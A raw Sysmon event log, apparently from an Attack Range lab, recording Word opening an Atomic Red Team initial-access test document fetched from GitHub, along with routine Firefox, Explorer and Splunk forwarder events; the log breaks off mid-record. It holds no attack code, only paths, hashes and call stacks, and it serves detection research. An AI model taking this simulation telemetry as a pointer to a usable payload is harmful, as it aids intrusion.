12:24:56.223{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441351Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:57.511{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=349726ACB71AECB6B3F11E0212ACA0C4,SHA256=3C5AD0CF2DF091F2C7A0CD9E9C4C2D99E8FB0C393E1CAA85F676A3B1FAB47D0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292701Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.204{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ECE530E103F4806DD9BD6707B5149F9,SHA256=658E998D6C08E7016EFF3BC048A5F2312017D7C146688E98177B6B31A88B8F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292700Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.073{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~WRL0005.tmpMD5=EC05A80D620EDE36CA558855EACEEADF,SHA256=A0F2E98158BC349D82238DDA483AFFA2A10CBCC1B6FF3E61463C5E2B8CC11D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292699Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.073{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\~DFE1668EA99C39B756.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 15241500x8000000000000000292698Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.051{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~WRD0004.tmp:Zone.Identifier2021-04-26 20:49:54.916MD5=6C3CFCACF7A46AB75D0774B2DC60D34C,SHA256=BC4E3BFB84750D18CA0C20CA7BCDA6D949F4316280E96BF6E6C21488C6ACDBA5,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3 ReferrerUrl=https://github.com/redcanaryco/atomic-red-team/blob/e88a1ea463964839e267dba74ec1cf7bf634ccbf/ARTifacts/Initial_Access/Atomic.doc HostUrl=https://raw.githubusercontent.com/redcanaryco/atomic-red-team/e88a1ea463964839e267dba74ec1cf7bf634ccbf/ARTifacts/Initial_Access/Atomic.doc 11241100x8000000000000000292697Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localDownloads2021-04-27 12:24:57.051{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~WRD0004.tmp:Zone.Identifier2021-04-26 20:49:54.916 15241500x8000000000000000292696Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.051{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~WRD0004.tmp2021-04-26 20:49:54.916MD5=7405E11986629184DFA354C59472780D,SHA256=906D1965EEBFEA4220267B56A48A18F2DF9368637B2D90C2CE919BB19534640D,IMPHASH=00000000000000000000000000000000- 23542300x8000000000000000292695Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:57.051{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\~DFE64A266831CD10B9.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 11241100x8000000000000000292694Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localDownloads2021-04-27 12:24:57.035{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\Downloads\~WRD0004.tmp2021-04-27 12:24:57.035 10341000x8000000000000000441350Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:57.224{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441349Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:57.224{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441354Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.521{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93729B959F8ECBECD982399F9E945EB2,SHA256=89F9867C6FD7ACFC7A68E3945199BB6F237CF3E6E7F28E1DA6DA38F13ACC5220,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292704Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:58.607{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292703Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:58.591{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292702Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:58.206{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CD864A1300521A76C7F4EC16A295B3C,SHA256=3B48EEDEE2B903EE2369BF5BD2C63768CFADC959F57A5F6AC427CE976057A7EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441353Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.225{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441352Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.225{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441357Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:59.555{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B6B6225FB167F325F880EAEED6F9213,SHA256=615263C1C05C833A978E30F7FEDC5746474A7D58389CB830DE277965A13B77B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292745Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.925{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\pending_pings\185c05f6-1b03-43cd-8438-df1cf4362766MD5=5A0A2D707B3746B374486ECB29B768D4,SHA256=45B74BE8E9BB8AA59F27285F3566CC481CD1B5CD4CD822386A6104168C330FBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292744Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E81D18A3F5B28B50C77F6773BAA401DA,SHA256=354FA2C08E6B29A04DE273AB6BF395EB440924CAFCCDFB1180CFD12AA1F37DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292743Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.jsonMD5=97AC06669A38B1A3250F971E7FB4C80D,SHA256=B22D080CF7718CA46971344EAA742A879C2B5239B8B7435EC90F65228A161B24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292742Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.jsonMD5=6CA4960355E4951C72AA5F6364E459D5,SHA256=88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292741Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E81D18A3F5B28B50C77F6773BAA401DA,SHA256=354FA2C08E6B29A04DE273AB6BF395EB440924CAFCCDFB1180CFD12AA1F37DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292740Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.jsonMD5=6CA4960355E4951C72AA5F6364E459D5,SHA256=88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292739Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.jsonMD5=E4E83F8123E9740B8AA3C3DFA77C1C04,SHA256=6034F27B0823B2A6A76FE296E851939FD05324D0AF9D55F249C79AF118B0EB31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292738Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C81DA48C-C7F8-48CC-9035-5212F01B1FF8}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292737Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C9757EC0-DB13-488C-BAF5-22F816AB897D}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292736Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0A0C2D72-9406-4838-B521-24BEB80EF703}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292735Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.909{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{E6162454-DA0E-473F-A391-817BFBA107AD}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292734Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{105F1658-CB0C-4D9A-9955-82D9AF73EB05}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292733Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C899BEC2-2DD1-4493-B800-229199E847A5}.tmpMD5=BDD8F8E371B0E54F43F6FE4B81DC05CF,SHA256=F1B3FA701A0A5FCB622C77388EB78592FA2C251675007EE5AD927926CDBB3F5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292732Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{CD25626D-4312-484F-96F8-28D0BB4B5123}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292731Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{EF43F568-F4EA-4C4E-AB43-F6AFFAB156FD}.tmpMD5=830FBF83999E052538EAF156AB6ECB17,SHA256=D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292730Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{030AD918-25A4-4DD0-A902-5BB8D6797364}.tmpMD5=5D4D94EE7E06BBB0AF9584119797B23A,SHA256=4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292729Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.894{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dotmMD5=BDB755F54303A064E26DD48B5D2494C9,SHA256=90744EA28E9A2D1A26CBEE95C6D1ECD81BB784C31BC87703531D054860838E85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292728Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.840{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=1CFA047C66D49D87F8F860D4B2D6857A,SHA256=34C8A5932A0543D32914D67F4F93BE309738FD4FB7DF554D3E8B322615EB5857,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292727Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.840{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=67AB889DFFD25C24D9B48AA17FFB9091,SHA256=FCA0CDCB408C472BE182E2E5D56FB94CB7E5EBB0ACEE0C59A50D4E2C79EFBD3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292726Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=F1A10D7A2AEE8F3C33C3EA028DF8DC56,SHA256=7B93B4B8AADFBE37C52E73BFE3D7C0019CBE98FE13676F86DB8FF2EBD2C05AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292725Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=F1A10D7A2AEE8F3C33C3EA028DF8DC56,SHA256=7B93B4B8AADFBE37C52E73BFE3D7C0019CBE98FE13676F86DB8FF2EBD2C05AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292724Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=C878F52320BEBCE21EEE1AFBD2023734,SHA256=65D847F71B9EAC9C6056C52D9EAC0E933975C75792BD3BB7234770E63FF9A9AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292723Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=7D617842A20BA4600C333D887193FEDD,SHA256=11A8A452E8946F0BAA62DA0BEE8F5D8CFD298F06F1F73EA8BE181A66F86BA5C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292722Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\datareporting\glean\db\data.safe.binMD5=198AD8DF7E3F412829248CC10FDF4E25,SHA256=B1590E9AAFB45709583B54539E0F6A824C07A9D7A389AE0B58E2A3BAE17E13B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292721Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.825{BEA10069-D4AF-6086-5601-00000000BB01}436WIN-HOST-96\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000292720Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.756{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Downloads.lnk2021-04-26 20:50:06.576 23542300x8000000000000000292719Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.756{BEA10069-D4AF-6086-5601-00000000BB01}436WIN-HOST-96\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Downloads.lnkMD5=504298DC66B268C14E43FCF100A52F3A,SHA256=A74CA1CBFFEEF5887BFBA6E6A3C5E8009555F9796AA5E5EF0ECFAA80AA2283EB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000292718Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Atomic.lnk2021-04-26 20:50:06.561 23542300x8000000000000000292717Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-D4AF-6086-5601-00000000BB01}436WIN-HOST-96\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Atomic.lnkMD5=E2FA998EEDEC3B020E4AFFFC4ED830AD,SHA256=D94E5DFCB0411DC20CA10846449E0E3AD51A52515F19974102B2C3940009954C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292716Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:59.740{BEA10069-2590-6087-DA0F-00000000BB01}3156WIN-HOST-96\AdministratorC:\Program Files\Microsoft 